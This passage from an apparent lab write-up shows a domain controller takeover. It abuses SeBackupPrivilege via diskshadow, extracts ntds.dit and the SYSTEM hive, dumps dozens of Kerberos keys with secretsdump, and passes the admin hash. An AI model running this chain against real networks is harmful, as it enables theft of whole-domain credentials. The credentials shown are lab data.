└─# proxychains -q evil-winrm -i 172.22.20.25 -u svc_bkpadmin -p Admin123
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_bkpadmin\Documents> whoami
fpcorp\svc_bkpadmin
Volume shadow copy
Checking the current user's privileges shows SeBackupPrivilege, which can be abused through a volume shadow copy:
*Evil-WinRM* PS C:\Users\svc_bkpadmin\Documents> whoami /priv
特权信息
----------------------
特权名 描述 状态
============================= ================ ======
SeMachineAccountPrivilege 将工作站添加到域 已启用
>>>> SeBackupPrivilege 备份文件和目录 已启用
SeRestorePrivilege 还原文件和目录 已启用
SeShutdownPrivilege 关闭系统 已启用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用
Reference for the technique: Windows Privilege Escalation: SeBackupPrivilege - Hacking Articles
First create a temporary directory:
*Evil-WinRM* PS C:\Users\svc_bkpadmin\Documents> mkdir c:\temp
目录: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/10/2025 4:26 PM temp
*Evil-WinRM* PS C:\Users\svc_bkpadmin\Documents> cd c:\temp
Then create a file on Kali with the following contents:
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
Convert the line endings so the file is Windows-compatible:
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# unix2dos raj.dsh
unix2dos: converting file raj.dsh to DOS format...
Then upload it:
*Evil-WinRM* PS C:\temp> upload raj.dsh
Then run the following:
#Create the shadow copy
*Evil-WinRM* PS C:\temp> diskshadow /s raj.dsh
#Copy NTDS.dit from the Z: drive exposed by the shadow copy
*Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds . ntds.dit
#Save the SYSTEM registry hive
*Evil-WinRM* PS C:\temp> reg save hklm\system c:\Temp\system
Then download SYSTEM and NTDS.dit and decrypt them locally:
*Evil-WinRM* PS C:\temp> download ntds.dit
*Evil-WinRM* PS C:\temp> download system
Note: downloading system and ntds.dit may crash the domain controller because the files are large; splitting them into chunks before downloading is recommended (my first attempt at downloading system crashed it :( ).
Then decrypt ntds.dit locally with impacket-secretsdump:
GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# impacket-secretsdump -ntds ntds.dit -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x0cb60b80ef59101bdd56ead1fd31b7ab
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: bb3e7740c907449bc3af752e29efd442
[*] Reading and decrypting hashes from ntds.dit
fpcorp.int\wang137:aes128-cts-hmac-sha1-96:bf58c5ab41e5d55c8f3244209b07e480
fpcorp.int\wang137:des-cbc-md5:e62545f416517f40
fpcorp.int\wang_a4:aes256-cts-hmac-sha1-96:53d6493fb84a70a144948223c48b1377f7808129e85aa0c791d83bbb6b8c8db6
fpcorp.int\wang_a4:aes128-cts-hmac-sha1-96:2243a18c4eb1821083f730a845281edb
fpcorp.int\wang_a4:des-cbc-md5:3220ce164a3ecd3e
fpcorp.int\zhang_e9:aes256-cts-hmac-sha1-96:9cb2696bb82dc08dc6f9718f07396b8d939573e32131681dfd231efe8009fa49
fpcorp.int\zhang_e9:aes128-cts-hmac-sha1-96:4b5fae0670228a3245a956ce2bcb3246
fpcorp.int\zhang_e9:des-cbc-md5:13e60d6e9b3dab34
fpcorp.int\wang.a27:aes256-cts-hmac-sha1-96:0bf5afe2117314f1db9d5d7c1a62d5829e6f90c9866b8ab9c7a4df74b7e5d856
fpcorp.int\wang.a27:aes128-cts-hmac-sha1-96:9dcc42808c9055cd76ebd528f0860b3f
fpcorp.int\wang.a27:des-cbc-md5:c81fda2f32382ff1
fpcorp.int\zhao_4:aes256-cts-hmac-sha1-96:6fd911ca8a7f1c3d70ddb969487c1ab463788ea71a5344f3a8ef15f0f1388983
fpcorp.int\zhao_4:aes128-cts-hmac-sha1-96:526ee194ef7a0cd902a3746c33ead219
fpcorp.int\zhao_4:des-cbc-md5:f132d07abc7a6764
fpcorp.int\wang305:aes256-cts-hmac-sha1-96:c2602e4067c6427bd74807f5da4605e764a836eaebc77559f2de82d94c4c353c
fpcorp.int\wang305:aes128-cts-hmac-sha1-96:e197c8726abd92e994b35ae67729663c
fpcorp.int\wang305:des-cbc-md5:1508ab022a1697ab
fpcorp.int\yang.u66:aes256-cts-hmac-sha1-96:abd032c1e8285dbe9cb030ae495033807f03626e3d005c4ba0f7dcec0b434bd3
fpcorp.int\yang.u66:aes128-cts-hmac-sha1-96:44e2072253e966456dc05637820cce4e
fpcorp.int\yang.u66:des-cbc-md5:e9b02aa1f494796e
fpcorp.int\wu_h8:aes256-cts-hmac-sha1-96:1616c3d4b87434f474db37ed37d0bac7f85cbe2ddc81f7d3bdc7294ad5c617ec
fpcorp.int\wu_h8:aes128-cts-hmac-sha1-96:ae09cbd4fff6d4caa4723ccc18fb5795
fpcorp.int\wu_h8:des-cbc-md5:07d5736123d913bc
fpcorp.int\huang653:aes256-cts-hmac-sha1-96:ab902f146a56c0a33f282e3db1248f0d1f66b1f44e21b276f6182f70c751c877
fpcorp.int\huang653:aes128-cts-hmac-sha1-96:cd0d1d11fd1d719c395349977298fcec
fpcorp.int\huang653:des-cbc-md5:49f2bc54f14a46ce
fpcorp.int\zhang_a8:aes256-cts-hmac-sha1-96:f31f7af596d18ab862cd00b2139258df3530002750c6cf8eb0329381c4c2bdf7
fpcorp.int\zhang_a8:aes128-cts-hmac-sha1-96:266960d20d1e8940117dc695598e7534
fpcorp.int\zhang_a8:des-cbc-md5:b576801f7a8591c4
fpcorp.int\liu199:aes256-cts-hmac-sha1-96:f5e2b9e6d0888a6dbeffa2fbd911d9947ad5500d56e479c7985042e0fa8ea987
fpcorp.int\liu199:aes128-cts-hmac-sha1-96:8400278cbc8a3c474efad91c04cb2bfd
fpcorp.int\liu199:des-cbc-md5:4532081a2fcbbfe5
fpcorp.int\wu.i94:aes256-cts-hmac-sha1-96:e9466f911c030422b8f51ca6279a3981fb5a2d5c823c300113f8dae2c8a5f22d
fpcorp.int\wu.i94:aes128-cts-hmac-sha1-96:81950d5b50d4eff80d2de78598f97392
fpcorp.int\wu.i94:des-cbc-md5:b04054860e15dcf4
fpcorp.int\wang.i72:aes256-cts-hmac-sha1-96:ff758d1858dcd556f951c238be4202c18c46167e0bc6efb1f4c2551c10af6f57
fpcorp.int\wang.i72:aes128-cts-hmac-sha1-96:19b64b4bf48d0beaedd10c3b84ad713f
fpcorp.int\wang.i72:des-cbc-md5:ad152fbf54c4c2e5
fpcorp.int\wang.17:aes256-cts-hmac-sha1-96:8861d052c5cc63d1ad14dae13258916fdc5bfd39686623c3fb87f4d0eef09d2a
fpcorp.int\wang.17:aes128-cts-hmac-sha1-96:768ca4161fd48dbfa345d640d7d2c512
fpcorp.int\wang.17:des-cbc-md5:a2ece03b863bd6fe
fpcorp.int\zhang639:aes256-cts-hmac-sha1-96:a80b36cf45491325bd17fb6898b840fe2396220fcfa7d73f15a76f55bd36f32d
fpcorp.int\zhang639:aes128-cts-hmac-sha1-96:db2edf5f7124774fb15ff0806a956987
fpcorp.int\zhang639:des-cbc-md5:944cab515db69d23
fpcorp.int\wu_h4:aes256-cts-hmac-sha1-96:0a57fb6b7346a0758c58a342ed99ed66582e20b23ae70da235c0f6c19cba6307
fpcorp.int\wu_h4:aes128-cts-hmac-sha1-96:338a48e2a7352e6f1899767ae345c0f5
fpcorp.int\wu_h4:des-cbc-md5:588a3b1f38616b02
fpcorp.int\huang_2:aes256-cts-hmac-sha1-96:947f0270c63062aaf021046759f9ffdba5425bb0a3ae5ecb9d9f7caad0dd8e04
fpcorp.int\huang_2:aes128-cts-hmac-sha1-96:547320fe2cd05961f616fbf412b26d13
fpcorp.int\huang_2:des-cbc-md5:5d9ba16110797983
fpcorp.int\liu654:aes256-cts-hmac-sha1-96:afd3184894a140783e20cc2856b48e1000f6d6e67d47e37a7165f0232fe8b652
fpcorp.int\liu654:aes128-cts-hmac-sha1-96:cb0d8760e46d23b396ab12f747c41527
fpcorp.int\liu654:des-cbc-md5:38dcd07ccdbcece9
fpcorp.int\liu257:aes256-cts-hmac-sha1-96:109ced5e6cfdcc9340abc19a3684f4692d599c1706b99b38c416736769883103
fpcorp.int\liu257:aes128-cts-hmac-sha1-96:6937811b4175ae899cf879d29090052a
fpcorp.int\liu257:des-cbc-md5:a20298c18c68bfda
fpcorp.int\zhou_6:aes256-cts-hmac-sha1-96:24881d97cc2b1a0c90da6e08da3db2d5e8af512fb8690cde124fcbd5e2fa2ca4
fpcorp.int\zhou_6:aes128-cts-hmac-sha1-96:88a766be0481880dfa1053ad1b801972
fpcorp.int\zhou_6:des-cbc-md5:b06116165dbaa17f
fpcorp.int\li_a3:aes256-cts-hmac-sha1-96:77602d70dfff44dffaaed1778e70ecde0f387876a27ae2940282643e2c437c53
fpcorp.int\li_a3:aes128-cts-hmac-sha1-96:3729ecb45004653a491b31126de5b007
fpcorp.int\li_a3:des-cbc-md5:cb85106268fbe5dc
fpcorp.int\zhao427:aes256-cts-hmac-sha1-96:3d5821314afca3557799794a98e04c1e02cefe189e75a885878f2c21cfba7a22
fpcorp.int\zhao427:aes128-cts-hmac-sha1-96:7399ebeb58f263eae63169f090d69dad
fpcorp.int\zhao427:des-cbc-md5:020b3d9d4ffe51fd
fpcorp.int\zhou.a74:aes256-cts-hmac-sha1-96:c978c8c1fd7649ff41e39be2cc180b08ce4ec95a6e0cd04df36e0068152beb1c
fpcorp.int\zhou.a74:aes128-cts-hmac-sha1-96:38ade4eb8212044ba78fd9e2819a5277
fpcorp.int\zhou.a74:des-cbc-md5:0e7a19cbf2540197
fpcorp.int\zhou.36:aes256-cts-hmac-sha1-96:618b36a96831f2a251e9573952dfc49a231183fdd483d77157bf3e4c785111dd
fpcorp.int\zhou.36:aes128-cts-hmac-sha1-96:d9f788ceaf9cab2098ceeaad437c9e42
fpcorp.int\zhou.36:des-cbc-md5:f7c823154f92c88c
fpcorp.int\huang661:aes256-cts-hmac-sha1-96:eef97294893939e0ddbbf1aaea07b86250d3a09c9e533a31cb440e102d87a3b3
fpcorp.int\huang661:aes128-cts-hmac-sha1-96:a214050184f2648e2a7ca1dce4500989
fpcorp.int\huang661:des-cbc-md5:d9b53426b59eab7c
fpcorp.int\wang.79:aes256-cts-hmac-sha1-96:d093882dc4e26084787158e2cffc7ea42816a05eb5a48bf1935fa4cf3afe54b3
fpcorp.int\wang.79:aes128-cts-hmac-sha1-96:9b833a5a46bbf6e13fcc11247932f44c
fpcorp.int\wang.79:des-cbc-md5:5b07e3b6913826a1
fpcorp.int\wu_2:aes256-cts-hmac-sha1-96:5fef27dcb6c98a3a49b220cbb377a693bca22c807043dfd6bc07cf8c306d7b11
fpcorp.int\wu_2:aes128-cts-hmac-sha1-96:8d7a474a034b9835477a5a948858368d
fpcorp.int\wu_2:des-cbc-md5:ae9e85e59dd6376d
fpcorp.int\zhao.42:aes256-cts-hmac-sha1-96:576003b22b835c6f4fe6e42a6a67e58b2fd7e571013921fe979ae47f166c939a
fpcorp.int\zhao.42:aes128-cts-hmac-sha1-96:eba4befa59c087674b69a2eba2395a68
fpcorp.int\zhao.42:des-cbc-md5:b69e40df5eb64c4a
fpcorp.int\zhou_i3:aes256-cts-hmac-sha1-96:e24663e60692329fc920f744e2e756d54b74e85dcb3168ac760f9679e3c8cd75
fpcorp.int\zhou_i3:aes128-cts-hmac-sha1-96:b1de4677befa0032d29bab148c3a91e4
fpcorp.int\zhou_i3:des-cbc-md5:3efd542f080e1397
fpcorp.int\liu_6:aes256-cts-hmac-sha1-96:5c75983e28b6e69528fb4a5c568dbd0fc39d81311d4998af199d302289a31fd1
fpcorp.int\liu_6:aes128-cts-hmac-sha1-96:a720a5703dddc4d7dfd62bade140596c
fpcorp.int\liu_6:des-cbc-md5:f162d023fd0bb31c
fpcorp.int\huang.50:aes256-cts-hmac-sha1-96:c1c1241b137bd1063a7b3d4308236ced5a80fd8a3699fbcb526d07d45e9e7d04
fpcorp.int\huang.50:aes128-cts-hmac-sha1-96:0d4e53895f6c1e989315c300c766393e
fpcorp.int\huang.50:des-cbc-md5:83fb19fdb01f1331
fpcorp.int\wang_a3:aes256-cts-hmac-sha1-96:345b04bf34eaa357932bb6d3d43ce402c15da88f7885072ca367a250f8da0c8f
fpcorp.int\wang_a3:aes128-cts-hmac-sha1-96:45b3eba8835a3a81e7c1a7cb5aa0e1c1
fpcorp.int\wang_a3:des-cbc-md5:01a138fe62ab7331
fpcorp.int\huang309:aes256-cts-hmac-sha1-96:4c134b95e62ac8dcae1c05dc1fe50d698131ee0da265526e200114f21c1703a0
fpcorp.int\huang309:aes128-cts-hmac-sha1-96:f70e93006a1511cbfb77974b168bb1fd
fpcorp.int\huang309:des-cbc-md5:1c075eb35437dc79
fpcorp.int\zhao_8:aes256-cts-hmac-sha1-96:41a8cf6c8e21c0892d5eababff4d58069067a90320cda6ddce07672cc5512134
fpcorp.int\zhao_8:aes128-cts-hmac-sha1-96:7df48570bfc6909cedd06fc7f857e877
fpcorp.int\zhao_8:des-cbc-md5:ec5223b00401b37c
fpcorp.int\liu386:aes256-cts-hmac-sha1-96:aa6f169d69f64a5bc91217b5619027e8dde3781678d1902b7be7fb8d097fd32c
fpcorp.int\liu386:aes128-cts-hmac-sha1-96:8421b0bdf185304ebe77942e48540163
fpcorp.int\liu386:des-cbc-md5:7a7a021a9183a131
fpcorp.int\chen.33:aes256-cts-hmac-sha1-96:22a8d1aa515010c483d5f389f444541d78adbc5e8d1eda5a61ecca7e099c3d5e
fpcorp.int\chen.33:aes128-cts-hmac-sha1-96:50f920d54266f5f95389dc878c1c39fa
fpcorp.int\chen.33:des-cbc-md5:a145bc54e33292d9
fpcorp.int\wu603:aes256-cts-hmac-sha1-96:24d711f87807d7dee21e3ce6f7fbd6c51f624413156958aea9b6df31edc8a411
fpcorp.int\wu603:aes128-cts-hmac-sha1-96:b61189b0e123daaea558f093c98f2ba4
fpcorp.int\wu603:des-cbc-md5:6e456280b53713ae
fpcorp.int\wu.a64:aes256-cts-hmac-sha1-96:5d21bd0044c7087de313fd7baeef3bd481fcfba30358669c89ca5bcd072b335e
fpcorp.int\wu.a64:aes128-cts-hmac-sha1-96:d30c11292a374283648d95e68a668109
fpcorp.int\wu.a64:des-cbc-md5:43c75ebf9e922f31
fpcorp.int\wang.i73:aes256-cts-hmac-sha1-96:1f08e4a98a0f040c090aa22ca7fe5096b3b9b5436dc28a02e60b0f52ac5264c8
fpcorp.int\wang.i73:aes128-cts-hmac-sha1-96:f63eea10ea908892824b946f74abfce5
fpcorp.int\wang.i73:des-cbc-md5:02b3643e6e2abf9d
fpcorp.int\liu.i37:aes256-cts-hmac-sha1-96:54c09c0c79eae763575236bf12966fb7c8ce8833a16e33eff260e851a0ccb518
fpcorp.int\liu.i37:aes128-cts-hmac-sha1-96:7b9eb065bdeaf5954c1cf72ea9ca8e06
fpcorp.int\liu.i37:des-cbc-md5:6773b04ca7344fea
fpcorp.int\zhang871:aes256-cts-hmac-sha1-96:06c2640309aba2771e73d2710ab3c62007359d214a398eb425821a0835721867
fpcorp.int\zhang871:aes128-cts-hmac-sha1-96:ff0e4064b707a9c6f19449d94ef0a45d
fpcorp.int\zhang871:des-cbc-md5:23d086e6237a5154
fpcorp.int\yang441:aes256-cts-hmac-sha1-96:2a696df575546dfc7d9cc7313b3b8e0d5f8efddd7050cdf5a7c5426fc7c65a70
fpcorp.int\yang441:aes128-cts-hmac-sha1-96:c47f05a54aade1643a84f5d4c46799c7
fpcorp.int\yang441:des-cbc-md5:914652b9a1615bc1
fpcorp.int\li515:aes256-cts-hmac-sha1-96:3fd14a62f3f0e30cc05761ebae97124fb550135480efadf07e9622ab14baea04
fpcorp.int\li515:aes128-cts-hmac-sha1-96:e7fe5d4d318934ccdccb6581e8bdea74
fpcorp.int\li515:des-cbc-md5:109bbc1fd3b9a7b3
fpcorp.int\chen.i15:aes256-cts-hmac-sha1-96:150e47b2bf07171b8f77c2be2a9553495f5ad8b0532b4eb4977cdc9d2b3ea03b
fpcorp.int\chen.i15:aes128-cts-hmac-sha1-96:f3bebf09598c2c8a17066d27b26775e8
fpcorp.int\chen.i15:des-cbc-md5:10629dd6835e070b
fpcorp.int\wu_3:aes256-cts-hmac-sha1-96:1c77087cd8dc162294fd24b16922c64b94325a3ee24d481592abd79a08195383
fpcorp.int\wu_3:aes128-cts-hmac-sha1-96:9de7341d69fddf1d5897ccc7ae08baba
fpcorp.int\wu_3:des-cbc-md5:2f4a1cea67704662
fpcorp.int\wu753:aes256-cts-hmac-sha1-96:8a405875ceb05745f245bc08275b578201963428e2997883d954f1210262f0b7
fpcorp.int\wu753:aes128-cts-hmac-sha1-96:2d06a86d4bdbfef011a7325ad7641f65
fpcorp.int\wu753:des-cbc-md5:c262ae4fdc972c57
fpcorp.int\zhao_6:aes256-cts-hmac-sha1-96:c2999d518412212507f3b42afbb670376d8216022f902a6e4ba9298db4342413
fpcorp.int\zhao_6:aes128-cts-hmac-sha1-96:1aee872c863a7d7771e1f193e6fbfc51
fpcorp.int\zhao_6:des-cbc-md5:0489b32c646b439e
fpcorp.int\zhou.88:aes256-cts-hmac-sha1-96:9b3815ff9b7d2b2b85ab357972aed520230956fd589a66d291ea5a1467e35b2e
fpcorp.int\zhou.88:aes128-cts-hmac-sha1-96:89dd43d50f556c2d56c460bcca0c7b57
fpcorp.int\zhou.88:des-cbc-md5:a45434fb23349dd5
fpcorp.int\chen535:aes256-cts-hmac-sha1-96:f8b509e9dba6b774aeb4544bb5f4994069157c71fe7b8160b1296bd1e0ba5012
fpcorp.int\chen535:aes128-cts-hmac-sha1-96:a82472c7d8d338f5b92638b364ecf4a8
fpcorp.int\chen535:des-cbc-md5:8cd38a5dad8cdf70
fpcorp.int\wu.63:aes256-cts-hmac-sha1-96:b3c4282f5e49050f6d1439feea677e0b9a48e40b983950e3c5a4f84fc82e6b61
fpcorp.int\wu.63:aes128-cts-hmac-sha1-96:cafa13ec332263e9c93ef750e343eea4
fpcorp.int\wu.63:des-cbc-md5:aef4895b54266e02
fpcorp.int\liu511:aes256-cts-hmac-sha1-96:7e2f6e395f7ae32f01287e3768cce9d9a85385e19eb1d9a2d792fa4f760e16ac
fpcorp.int\liu511:aes128-cts-hmac-sha1-96:b1ad96ce28dc67486ce2c3253b2080b2
fpcorp.int\liu511:des-cbc-md5:b01cb9a1d3fddf80
fpcorp.int\li_4:aes256-cts-hmac-sha1-96:27091cb5a222ceebc2780b6b1b99e5d23d7ead64e1b43014f8fa4c73a4c3719e
fpcorp.int\li_4:aes128-cts-hmac-sha1-96:ff0464857cfdeed5656bea9fa19241cb
fpcorp.int\li_4:des-cbc-md5:5429bc541c893eb3
fpcorp.int\li_a6:aes256-cts-hmac-sha1-96:52f5d4896498f0afa1bc61994be519b232f523580d62f66961c281c792d5864f
fpcorp.int\li_a6:aes128-cts-hmac-sha1-96:84db860c31c665b04f39b328d4822373
fpcorp.int\li_a6:des-cbc-md5:2cc79e0de9e5bcf7
fpcorp.int\chen.i95:aes256-cts-hmac-sha1-96:5fb09a2e1b47e49634576a69a42ae5532222bf86609c2866fe29b3422a55711a
fpcorp.int\chen.i95:aes128-cts-hmac-sha1-96:9885915d1df444dc1d6aa09a06156168
fpcorp.int\chen.i95:des-cbc-md5:c17afb7f3e324a4c
fpcorp.int\yang_a3:aes256-cts-hmac-sha1-96:ecbb79a5142a15c0562f297b8aa956f743170ac926cc34a182776b1d79940462
fpcorp.int\yang_a3:aes128-cts-hmac-sha1-96:1f6476115a1bf3486a027643682edb14
fpcorp.int\yang_a3:des-cbc-md5:645404d9a764543d
svc_bkpadmin:aes256-cts-hmac-sha1-96:80ae88eff1589f7860950fef0f5f63a81e8daaf81b86bc9e202affaa8223df95
svc_bkpadmin:aes128-cts-hmac-sha1-96:a10780d58cd791427367b3fb0f129e0c
svc_bkpadmin:des-cbc-md5:b0d9b64c5dae4a52
[*] Cleaning up...
Finally, pass the domain admin's NT hash to evil-winrm (through the proxychains pivot) to log in to the domain controller and grab the last flag.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q evil-winrm -i 172.22.20.25 -u administrator -H 972ffc4a036603066d388a1e28b4f583
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/1/2025 11:09 AM Dism++10.1.1002.1B
-a---- 7/1/2025 11:10 AM 1164 Active Directory Users and Computers.lnk
-a---- 2/5/2025 3:44 PM 617352 ADExplorer64.exe
-a---- 7/4/2025 10:25 AM 42 flag.txt
-a---- 7/5/2025 9:38 PM 2292 Microsoft Edge.lnk
*Evil-WinRM* PS C:\Users\Administrator\desktop> type flag.txt
flag{1f2fd1d1-adec-48de-beaf-8540d6e08d44}